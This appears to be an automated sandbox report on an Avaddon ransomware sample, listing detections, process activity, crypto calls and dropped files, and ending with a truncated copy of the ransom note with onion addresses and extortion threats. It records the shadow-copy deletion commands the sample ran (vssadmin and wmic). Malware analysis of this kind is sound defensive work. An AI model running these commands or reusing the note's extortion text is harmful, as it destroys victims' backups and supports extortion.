Play interactive tour

Edit tour

Windows Analysis Report ab.bin

Overview

General Information

Sample Name:	ab.bin (renamed file extension from bin to exe)
Analysis ID:	548854
MD5:	0b486fe0503524cfe4726a4022fa6a68
SHA1:	297dea71d489768ce45d23b0f8a45424b469ab00
SHA256:	1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2
Infos:
Most interesting Screenshot:

Detection

Avaddon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Avaddon Ransomware

Found ransom note / readme

Antivirus / Scanner detection for submitted sample

Yara detected RansomwareGeneric

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Sigma detected: Copying Sensitive Files with Credential Data

Yara detected PersistenceViaHiddenTask

Spreads via windows shares (copies files to share folders)

Creates processes via WMI

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Machine Learning detection for dropped file

Deletes shadow drive data (may be related to ransomware)

Disables UAC (registry)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Creates COM task schedule object (often to register a task for autostart)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ab.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\ab.exe" MD5: 0B486FE0503524CFE4726A4022FA6A68)

WMIC.exe (PID: 1744 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vssadmin.exe (PID: 5468 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 7444 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vssadmin.exe (PID: 7608 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 7676 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vssadmin.exe (PID: 7752 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ab.exe (PID: 4876 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe MD5: 0B486FE0503524CFE4726A4022FA6A68)

WMIC.exe (PID: 4520 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 4800 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 3148 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ab.exe (PID: 1864 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe MD5: 0B486FE0503524CFE4726A4022FA6A68)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000023.00000002.438770513.0000000001537000.00000004.00000020.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.321666234.0000000004DB7000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000002.00000002.309597830.000000000069A000.00000004.00000020.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.317170385.00000000043E8000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Process Memory Space: ab.exe PID: 6212	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: ab.exe PID: 6212	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: ab.exe PID: 6212	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Click to see the 18 entries

Sigma Overview

System Summary:

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities

Show sources

Source: Process started

Author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: wmic SHADOWCOPY DELETE /nointeractive, CommandLine: wmic SHADOWCOPY DELETE /nointeractive, CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Users\user\Desktop\ab.exe" , ParentImage: C:\Users\user\Desktop\ab.exe, ParentProcessId: 6212, ProcessCommandLine: wmic SHADOWCOPY DELETE /nointeractive, ProcessId: 1744

Sigma detected: Copying Sensitive Files with Credential Data

Show sources

Source: Process started

Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: vssadmin Delete Shadows /All /Quiet, CommandLine: vssadmin Delete Shadows /All /Quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\SysWOW64\vssadmin.exe, NewProcessName: C:\Windows\SysWOW64\vssadmin.exe, OriginalFileName: C:\Windows\SysWOW64\vssadmin.exe, ParentCommandLine: "C:\Users\user\Desktop\ab.exe" , ParentImage: C:\Users\user\Desktop\ab.exe, ParentProcessId: 6212, ProcessCommandLine: vssadmin Delete Shadows /All /Quiet, ProcessId: 5468

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: ab.exe	Virustotal: Detection: 88%	Perma Link
Source: ab.exe	Metadefender: Detection: 65%	Perma Link
Source: ab.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Show sources

Source: ab.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Avira: detection malicious, Label: HEUR/AGEN.1136765

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Virustotal: Detection: 88%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Metadefender: Detection: 65%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: ab.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01304E30 CryptReleaseContext,	2_2_01304E30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01309150 CryptEncrypt,	2_2_01309150
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_013091A0 CryptDestroyKey,CryptReleaseContext,	2_2_013091A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0130A050 CryptExportKey,	2_2_0130A050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0130A0A0 CryptEncrypt,	2_2_0130A0A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0130A0E0 CryptExportKey,	2_2_0130A0E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01309BE0 CryptAcquireContextW,CryptGenKey,CryptDestroyKey,CryptReleaseContext,	2_2_01309BE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01308BC0 CryptAcquireContextW,CryptGenKey,GetFileAttributesW,SetFileAttributesW,CreateFileW,CloseHandle,CloseHandle,CryptDestroyKey,CryptReleaseContext,	2_2_01308BC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01309A90 CryptAcquireContextW,GetLastError,CryptAcquireContextW,	2_2_01309A90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01309AF0 CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,	2_2_01309AF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01310C10 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDuplicateKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	2_2_01310C10

Source: ab.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Downloads\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Favorites\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\user\Searches\uCLrcwQ_readme_.txt	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt	Jump to behavior

Source: ab.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Spreading:

Spreads via windows shares (copies files to share folders)

Show sources

Source: C:\Users\user\Desktop\ab.exe	File created: Z:\$RECYCLE.BIN	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini	Jump to behavior

Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Desktop\ab.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: c:	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0130D280 FindFirstFileW,FindNextFileW,FindClose,

2_2_0130D280

Source: ab.exe, 00000000.00000003.332133858.00000000043E8000.00000004.00000010.sdmp	String found in binary or memory: https://www.torproject.o
Source: ab.exe, 00000000.00000003.317616341.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.327252185.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.330084919.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324632117.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321699591.0000000004DB8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, uCLrcwQ_readme_.txt8.0.dr, uCLrcwQ_readme_.txt.0.dr, uCLrcwQ_readme_.txt5.0.dr, uCLrcwQ_readme_.txt10.0.dr, uCLrcwQ_readme_.txt9.0.dr, uCLrcwQ_readme_.txt4.0.dr, uCLrcwQ_readme_.txt2.0.dr, uCLrcwQ_readme_.txt6.0.dr, uCLrcwQ_readme_.txt1.0.dr, uCLrcwQ_readme_.txt7.0.dr, uCLrcwQ_readme_.txt0.0.dr, uCLrcwQ_readme_.txt3.0.dr	String found in binary or memory: https://www.torproject.org/

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Avaddon Ransomware

Show sources

Source: Yara match	File source: 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.438770513.0000000001537000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.321666234.0000000004DB7000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.309597830.000000000069A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317170385.00000000043E8000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Source: Yara match	File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED

Found ransom note / readme

Show sources

Source: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt

Dropped file: -------=== Your network has been infected! ===-------***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabeaYou are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!We have also downloaded a lot of private data from your network.If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.You can get more information on our page, which is located in a Tor hidden network.How to get to our page--------------------------------------------------------------------------------|| 1. Download Tor browser - https://www.torproject.org/|| 2. Install Tor browser|| 3. Open link in Tor browser - avaddonbotrxmuyl.onion|| 4. Follow the instructions on this page|--------------------------------------------------------------------------------Your 